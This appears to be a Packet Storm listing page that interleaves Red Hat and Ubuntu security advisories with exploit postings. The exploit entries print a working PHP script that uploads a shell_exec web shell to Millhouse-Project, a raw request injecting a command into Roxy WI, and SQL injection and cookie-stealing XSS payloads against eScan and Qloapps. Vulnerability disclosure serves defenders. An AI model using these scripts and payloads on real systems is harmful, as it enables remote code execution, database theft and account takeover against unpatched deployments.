Red Hat Security Advisory 2023-3218-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.60.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.10.60 security update  
Advisory ID:       RHSA-2023:3218-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3218  
Issue date:        2023-05-24  
CVE Names:         CVE-2022-3064   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.10.60 is now available with  
updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.10.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.10.60. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHBA-2023:3217

Security Fix(es):

* go-yaml: Improve heuristics preventing CPU/memory abuse by parsing  
malicious or large YAML documents (CVE-2022-3064)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents

5. References:

https://access.redhat.com/security/cve/CVE-2022-3064  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG3HttzjgjWX9erEAQjuARAAn7iACfsU/6YVoXBeN0ZsqTfM4VC6QYQd  
0EBFfpoU/Jtnd9NmMXupopu7peeDKZbF3JiaShvcUg4nOhX0/mocgU9PSjn4g0M/  
VBzY1bVwCggAvJ4qziWF+S1qbjHXDUELsbhVcMpngjaSk+xK2BMbLUwXB8DfzuEJ  
H9rt/h1vbprzI8pZOleFQybapXS/1C7q06iuiHztJhXgPIO+Nmfuowq5oNvUajfB  
5N48kk4EvSMe55emBw334kFbB82+US6QVbgwewWUYx+4rQMgtgSz5Md9Yh37WwZz  
zgLm5TBzTRA3ovIrFD2r2nTtwqnGcXFAmqGd35GTBzBUeoUwD8/KWS3bWX+F2sFt  
S6fD02wKhs60aakua6Byd+vBEpWlCz5ECso87bu8y7prbCqLN4Ao5eoBPMMYjgcq  
UuxptrFU57QwzN5tG7vE9QjBMHJvyjdgIhqby6gJqYhBTuAMB5o+cKQurGfA+Q+y  
rLPEJXBLgUuvyh3Nx//hbDk/1Lb0QKMMf4Djlz1mOPczg5+l2UBGUNgBND/Vj+Rt  
u2u985vqSTAoXr3210jt6tfdBe0RwWnIuaeCN0/MnapL2ri9WWP9NKyOfBr7EX4p  
UGNOKmIGkMV6M/qDmG8F5cIsG8zwUt3HH4CbEJBf/jM1XBtV1zW0GjsJGxFkYr7G  
agi2DhTB5lM=  
=ULYj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3218-01

thrsrossi Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

thrsrossi Millhouse-Project 1.414 Shell Upload

Roxy WI version 6.1.0.0 remote command execution exploit. This is a variant of the original disclosure of remote command execution in this version by Nuri Cilengir in April of 2023.

    # Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute# Exploit Author: Iyaad Luqman K# Application: Roxy WI <= v6.1.0.0# Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Tested on: Ubuntu 22.04# CVE : CVE-2022-31137# PoCPOST /app/options.py HTTP/1.1Host: 192.168.1.44User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 136Origin: https://192.168.1.44Referer: https://192.168.1.44/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1

Roxy WI 6.1.0.0 Remote Command Execution

Ubuntu Security Notice 6102-1 - It was discovered that xmldom incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause unexpected syntactic changes during XML processing. This issue only affected Ubuntu 20.04 LTS. It was discovered that xmldom incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6102-1  
May 24, 2023

node-xmldom vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in xmldom.

Software Description:  
- node-xmldom: A pure JavaScript W3C standard-based `DOMParser` and   
`XMLSerializer` module.

Details:

It was discovered that xmldom incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to cause  
unexpected syntactic changes during XML processing. This issue only affected  
Ubuntu 20.04 LTS. (CVE-2021-21366)

It was discovered that xmldom incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to cause a  
denial of service. (CVE-2022-37616, CVE-2022-39353)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   node-xmldom                     0.7.5-1ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   node-xmldom                     0.7.5-1ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   node-xmldom                     0.1.27+ds-1+deb10u2build0.20.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6102-1  
   CVE-2021-21366, CVE-2022-37616, CVE-2022-39353

Package Information:  
   https://launchpad.net/ubuntu/+source/node-xmldom/0.7.5-1ubuntu0.22.10.1  
   https://launchpad.net/ubuntu/+source/node-xmldom/0.7.5-1ubuntu0.22.04.1

 https://launchpad.net/ubuntu/+source/node-xmldom/0.1.27+ds-1+deb10u2build0.20.04.1

Ubuntu Security Notice USN-6102-1

eScan Management Console version 14.0.1400.2281 suffers from a remote SQL injection vulnerability.

    # Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)# Date: 16/05/2023# Exploit Author: Sahil Ojha# Vendor Homepage: https://www.escanav.com# Software Link: https://cl.escanav.com/ewconsole.dll# Version: 14.0.1400.2281# Tested on: Windows# CVE : CVE-2023-31702*Step of Reproduction/Proof of concept(POC)*1. Login into the escan management console with a valid username andpassword as root user.2. Navigate to URL:https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=41763. Inject the payload into the UsrId parameter to confirm the SQLinjection as shown below:https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFORDELAY '0:0:5'--&cnt=41764. The time delay of 5 seconds confirmed that "UsrId" parameter wasvulnerable to SQL Injection. Furthermore, it was also possible to dumpall the databases and inject OS shell directly into the MS SQL Serverusing SQLMap tool.

eScan Management Console 14.0.1400.2281 SQL Injection

Ubuntu Security Notice 5996-2 - USN-5996-1 fixed vulnerabilities in Liblouis. This update provides the corresponding updates for Ubuntu 23.04. It was discovered that Liblouis incorrectly handled certain files. An attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5996-2May 23, 2023liblouis vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04Summary:Several security issues were fixed in liblouis.Software Description:- liblouis: Braille translation library - utilitiesDetails:USN-5996-1 fixed vulnerabilities in Liblouis. This update providesthe corresponding updates for Ubuntu 23.04.Original advisory details: It was discovered that Liblouis incorrectly handled certain files. An attacker could possibly use this issue to cause a denial of service. (CVE-2023-26767, CVE-2023-26768, CVE-2023-26769)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:  liblouis-bin                    3.24.0-1ubuntu0.1  liblouis20                      3.24.0-1ubuntu0.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5996-2  https://ubuntu.com/security/notices/USN-5996-1  CVE-2023-26767, CVE-2023-26768, CVE-2023-26769Package Information:  https://launchpad.net/ubuntu/+source/liblouis/3.24.0-1ubuntu0.1

Ubuntu Security Notice USN-5996-2

Ubuntu Security Notice 6098-1 - It was discovered that Jhead did not properly handle certain crafted images while processing the JFIF markers. An attacker could cause Jhead to crash. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 18.04 LTS. It was discovered that Jhead did not properly handle certain crafted images while processing longitude tags. An attacker could cause Jhead to crash. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6098-1  
May 23, 2023

Jhead vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Jhead.

Software Description:  
- jhead: Manipulate the non-image part of Exif compliant JPEG files

Details:

It was discovered that Jhead did not properly handle certain crafted images  
while processing the JFIF markers. An attacker could cause Jhead to crash. This  
issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 18.04 LTS.  
(CVE-2019-19035)

It was discovered that Jhead did not properly handle certain crafted images  
while processing longitude tags. An attacker could cause Jhead to crash. This  
issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-1010301)

It was discovered that Jhead did not properly handle certain crafted images  
while processing IPTC data. An attacker could cause Jhead to crash. This  
issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-1010302)

Binbin Li discovered that Jhead did not properly handle certain crafted images  
while processing the DQT data. An attacker could cause Jhead to crash.  
(CVE-2020-6624)

Binbin Li discovered that Jhead did not properly handle certain crafted images  
while processing longitude data. An attacker could cause Jhead to crash.  
(CVE-2020-6625)

Feng Zhao Yang discovered that Jhead did not properly handle certain crafted  
images while reading JPEG sections. An attacker could cause Jhead to crash.  
(CVE-2020-26208)

It was discovered that Jhead did not properly handle certain crafted images  
while processing Canon images. An attacker could cause Jhead to crash.  
(CVE-2021-28276)

It was discovered that Jhead did not properly handle certain crafted images  
when removing a certain type of sections. An attacker could cause Jhead to  
crash. (CVE-2021-28278)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   jhead                           1:3.04-1ubuntu0.1

Ubuntu 18.04 LTS:  
   jhead                           1:3.00-8~ubuntu0.1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   jhead                           1:3.00-4+deb9u1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   jhead                           1:2.97-1+deb8u2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6098-1  
   CVE-2019-1010301, CVE-2019-1010302, CVE-2019-19035, CVE-2020-26208,  
   CVE-2020-6624, CVE-2020-6625, CVE-2021-28276, CVE-2021-28278

Package Information:  
   https://launchpad.net/ubuntu/+source/jhead/1:3.04-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/jhead/1:3.00-8~ubuntu0.1

Ubuntu Security Notice USN-6098-1

Webkul Qloapps version 1.5.2 suffers from a cross site scripting vulnerability.

# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)  
# Date: 15 May 2023  
# Exploit Author: Astik Rawat (ahrixia)  
# Vendor Homepage: https://qloapps.com/  
# Software Link: https://github.com/webkul/hotelcommerce  
# Version: 1.5.2  
# Tested on: Kali Linux 2022.4  
# CVE : CVE-2023-30256

Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:  
1) Go to Signin page on the system.  
2) There are two parameters which can be exploited via XSS  
  - back  
  - email_create

2.1) Insert your payload in the "back"- GET and POST Request   
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

    Payload (Plain text):   
  xss onfocus=alert(1) autofocus= xss

  Payload (URL Encoded):   
  xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

  Full GET Request (back):   
  [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" - POST Request Only  
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

  Payload (Plain text):   
  xss><img src=a onerror=alert(document.cookie)>xss

  Payload (URL Encoded):   
  xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

  POST Request (email_create) (POST REQUEST DATA ONLY):   
  [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

Webkul Qloapps 1.5.2 Cross Site Scripting

Red Hat Security Advisory 2023-3263-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:3263-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3263  
Issue date:        2023-05-23  
CVE Names:         CVE-2023-25652 CVE-2023-29007   
=====================================================================

1. Summary:

An update for git is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: by feeding specially crafted input to `git apply --reject`, a path  
outside the working tree can be overwritten with partially controlled  
contents (CVE-2023-25652)

* git: arbitrary configuration injection when renaming or deleting a  
section from a configuration file (CVE-2023-29007)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2188333 - CVE-2023-25652 git: by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents  
2188338 - CVE-2023-29007 git: arbitrary configuration injection when renaming or deleting a section from a configuration file

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-daemon-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-daemon-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64le.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-daemon-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.s390x.rpm  
git-svn-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGzKg9zjgjWX9erEAQhQNQ//QfOqb56Pkppxh/2ftKCQT0rWX4HllcRU  
O+NEKAmDXJKmI2cFDGiGzbhFK2UeEDPBd1lszD+44kOdUNWrJi4OHbWVq0hLVXKM  
qxAJLGV1mIm5mTpBHZh9bJ6hrkpekh8svuEtZcT4Q+ZykeA8cEQX5jpFtUJJqTZd  
tkzx8ijU2Xb3Ufawerogu6Vo8tPle2XD79M6b0Uf34NvDHtyEudyRQseZHZIgMer  
aUkriuvw0MjVLs8Sl5/DKC1PoKm9waTeYVPsovmlNcFD1IllBA6bba2qcsOS2gIb  
BSWhyon8cq4OpDSNhASWVF36U/nM33IPFto1cgiwhapit6HbO2jhqWUQnbrA5hOO  
mkUJrQWylOH6ymIprmVV0yBC3m4NwTcevM7fjdZaeMe4WcHizOCAz7gJ3kYbgd1v  
EZSnXtm5/tenxjFxTn64D1psuEg5dG/qamr51o2RQRpTuW9qJuV22+jMt676fuOr  
V3AAeUi6d+d5TD3dKO5KV3OTn2p9x+OkeXj2+Pn5F4Le2KT+JyJ6MtPh70HbuF4P  
OH6EbN8aLLlVzdIYPOg8TY4/dr7pyqqHK1p4XEnsFbcIHADm6AizDep+3E0TgnbU  
AEphXpmipQRPezqXgk66qNBXL9PM1iwKnGckL76i5/rDK1yW6wCnAq8A0TbkDFq1  
/fL8GIBuo5E=  
=/li4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3263-01

eScan Management Console version 14.0.1400.2281 suffers from a cross site scripting vulnerability.

    # Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting# Date: 2023-05-16# Exploit Author: Sahil Ojha# Vendor Homepage: https://www.escanav.com# Software Link: https://cl.escanav.com/ewconsole.dll# Version: 14.0.1400.2281# Tested on: Windows# CVE : CVE-2023-31703*Step of Reproduction/ Proof of Concept(POC)*1. Login into the eScan Management Console with a valid user credential.2. Navigate to URL:https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=3. Now, Inject the Cross Site Scripting Payload in "from" parameter asshown below and a valid XSS pop up appeared.https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=4. By exploiting this vulnerability, any arbitrary attacker could havestolen an admin user session cookie to perform account takeover.

Source

Packet Storm